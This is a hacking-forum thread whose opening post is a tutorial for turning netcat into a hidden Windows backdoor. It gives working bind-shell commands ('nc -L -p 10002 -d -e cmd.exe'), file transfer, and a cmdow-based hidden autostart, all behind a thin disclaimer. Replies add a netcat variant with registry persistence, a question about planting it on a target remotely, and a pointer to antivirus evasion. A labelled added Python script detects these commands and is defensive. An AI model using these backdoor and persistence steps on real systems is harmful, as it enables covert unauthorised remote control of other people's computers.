
Thread: Netcat Tutorial

  1. #1
    Member
    Join Date
    Jul 2007
    Posts
    113

    Netcat Tutorial

    I was recently looking for tutorials on Google on how to use netcat as a backdoor. I thought I might as well post what I learned. I personally ran netcat on my Linux computer and used it as the attacker, and used my Windows computer for the target computer.


    --------------------------------------------------------------------------------------------------------
    ~~~~~~~~~~~~~~~~~~~~~NetCatTutorial~~~~~~~~~~~~~~~~~~~
    --------------------------------------------------------------------------------------------------------


    Setting up and Connecting to a "target" computer
    First off, make sure you have netcat installed on your "attacking" computer and your "target" computer. It does not matter if the computer is running Unix or Windows.

    To be able to connect to this "target" you must first start netcat on the "target" computer so your "attacking" computer can connect.

    Windows: Open up a command prompt and make sure you are in the same directory as nc.exe (netcat). Then type "nc -L -p 10002 -d -e cmd.exe"
    This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer, open up a command prompt and type "nc 192.168.1.1 10002"; this will connect you to your "target's" computer.
    (I have not tested this on Linux, I have only backdoored Windows, so I am not positive these commands work properly.)

    Unix: Open up a konsole. Then type "netcat -L -p 10002 -d -e konsole"
    This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer, open up a command prompt and type "netcat 192.168.1.1 10002"; this will connect you to your "target's" computer.


    -L Tells netcat to not close and wait for a connection
    -p Tells netcat which port to listen on
    -d Tells netcat to detach from the process we want it to run
    -e Tells netcat which program to run after the port is connected



    Transferring files through netcat

    To send a file through netcat, enter the command "start nc.exe -l -p 1234 >file.txt" after you have connected to a Windows machine. The -p 1234 is the port netcat listens on, >file.txt is the file to be received through netcat.
    Enter this in a konsole on the "attacking" computer: "netcat 192.168.1.1 1234 <file.txt".

    Running netcat on startup hidden

    Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it in the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
    Now every time the computer boots netcat will start hidden.
    --------------------------------------------------------------------------------------------------------
    Package with all files used in the tutorial.
    http://rapidshare.com/files/45658237...or.tar.gz.html

    Mirrors
    http://z13.zupload.com/download.php?...filepath=79690
    http://www.sendspace.com/file/526t92

    Disclaimer
    This tutorial is for educational use only, please only use this information in a closed lab environment.

    Credits
    www.ol-service.com/sikurezza/doc/netcat_eng.pdf
    A couple of excerpts and a lot of information come from this PDF.
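
Added example (not part of the original post or thread): a defender-side triage of process-creation command lines for the patterns the tutorial above relies on, namely a netcat listener, the -L/-d/-e flags as the post describes them, and a cmdow /HID launch. The function names, tag strings and sample events are constructed for illustration.

```python
import re
import shlex

# Constructed process-creation command lines (the kind recorded by command-line
# auditing); they mirror the commands in the post plus two benign controls.
SAMPLE_EVENTS = [
    r"nc -L -p 10002 -d -e cmd.exe",
    r"cmdow /RUN /HID C:\start.bat",
    r"nc.exe -l -p 1234",
    r"netcat 192.168.1.1 10002",
    r"notepad.exe C:\notes.txt",
    r"ping -l 1400 -n 4 192.168.1.1",
]
# Assumption: matching on image name only. A renamed binary needs hash- or
# behaviour-based detection (e.g. an unexpected process owning a listening port).
NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe"}
CMDOW_NAMES = {"cmdow", "cmdow.exe"}

def classify(cmdline):
    """Return a list of finding tags for one process command line."""
    tokens = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
    args, findings = tokens[1:], []
    if image in NETCAT_NAMES:
        # Collect single-letter flags, including combined forms such as -lp.
        flags = {c for a in args if re.fullmatch(r"-[A-Za-z]+", a) for c in a[1:]}
        findings.append("netcat-listener" if flags & {"l", "L"} else "netcat-client")
        if "L" in flags:
            findings.append("relisten-after-close")
        if "d" in flags:
            findings.append("detached-from-console")
        for i, a in enumerate(args[:-1]):
            if re.fullmatch(r"-[A-Za-z]*e", a):  # -e takes the next token as its program
                findings.append("exec-on-connect:" + args[i + 1].lower())
    elif image in CMDOW_NAMES and any(a.upper() == "/HID" for a in args):
        findings.append("hidden-window-launch")
    return findings

def severity(findings):
    if any(f.startswith("exec-on-connect") or f == "hidden-window-launch" for f in findings):
        return "high"
    if "netcat-listener" in findings:
        return "medium"
    return "low" if findings else "none"

def triage(events):
    """Return (severity, command line) for every event that produced a finding."""
    return [(s, e) for e in events if (s := severity(classify(e))) != "none"]
```

On the sample, the ping line shows why the -l flag is only interpreted once the image name matches: ping also takes -l and is not flagged.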

  2. #2

    Nice work thanks for sharing this,

    I was starting to search for this very topic and you explained it well. Thanks again. Keep up the great work!
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  3. #3
    Member
    Join Date
    Jul 2007
    Posts
    113


    Thanks. :-)

  4. #4
    Junior Member g1ic7h's Avatar
    Join Date
    Jul 2007
    Posts
    73


    NetCat, great tool. Joseph, nice work, and it's good to see there is still interest in such an old tool. I've added more functions to the original program; here is my help list:

    C:\MyCat 2.0\Release>wnc -h
    [WildCat (wnc - v1.0) NT]
    connect to somewhere: wnc [-options] hostname port[s] [ports] ...
    listen for inbound:   wnc -l -p port [options] [hostname] [port]
    options:
      -b  beep       sound a internal beep when connected
      -B  chatbeep   sound a internal beep on inbound messages
      -c  commands   give commands for fun stuff
      -d  detach     detach from console, background mode
      -e  prog       inbound program to exec [dangerous!!]
      -g  gateway    source-routing hop point[s], up to 8
      -G  num        source-routing pointer: 4, 8, 12, ...
      -h  help       this cruft
      -H  examples   shows some usage examples
      -i  secs       delay interval for lines sent, ports scanned
      -l  listen     listen mode, for inbound connects
      -L  relisten   listen harder, re-listen on socket close
      -n  numeric    numeric-only IP addresses, no DNS
      -o  file       hex dump of traffic
      -p  port       local port number
      -P  password   password protect inbound/outbound connections
      -r  randomize  randomize local and remote ports
      -R  reconnect  to loop outbound connections in seconds
      -s  addr       local source address
      -S  startup    add startup key to registry
      -t  telnet     answer TELNET negotiation
      -u  upd        UDP mode
      -v  verbose    verbose [use twice to be more verbose]
      -w  secs       timeout for connects and final net reads
      -z  scanning   zero-I/O mode [used for scanning]
    port numbers can be individual or ranges: m-n [inclusive]

    The source code is out there; if you know any C-C++ you can build your own version, adding the functions you see fit.

    peace

  5. #5
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    11


    ahh good old netcat with a nice tutorial. Thanks

  6. #6
    Member Mortifix's Avatar
    Join Date
    Nov 2006
    Posts
    113


    So netcat is basically a trojan? The main thing for me is getting netcat installed on the target PC. How do I do that without actually sitting at the target computer?

  7. #7
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    Even the crappiest antivirus can detect netcat, so it's only useful for a one shot deal where you don't care if your attack is logged.

  8. #8
    banana88
    Guest


    Thanks thx

  9. #9
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    1


    Nice work! Where can we download the source code or binary of your WildCat? Please


  10. #10
    Just burned his ISO Fletch's Avatar
    Join Date
    Sep 2007
    Posts
    11


    "Even the crappiest antivirus can detect netcat, so it's only useful for a one shot deal where you don't care if your attack is logged."
    A good article on how to avoid AV detection by altering Netcat's signature can be found at:
    http://packetstormsecurity.org/paper...ack_Netcat.pdf

    Fletch
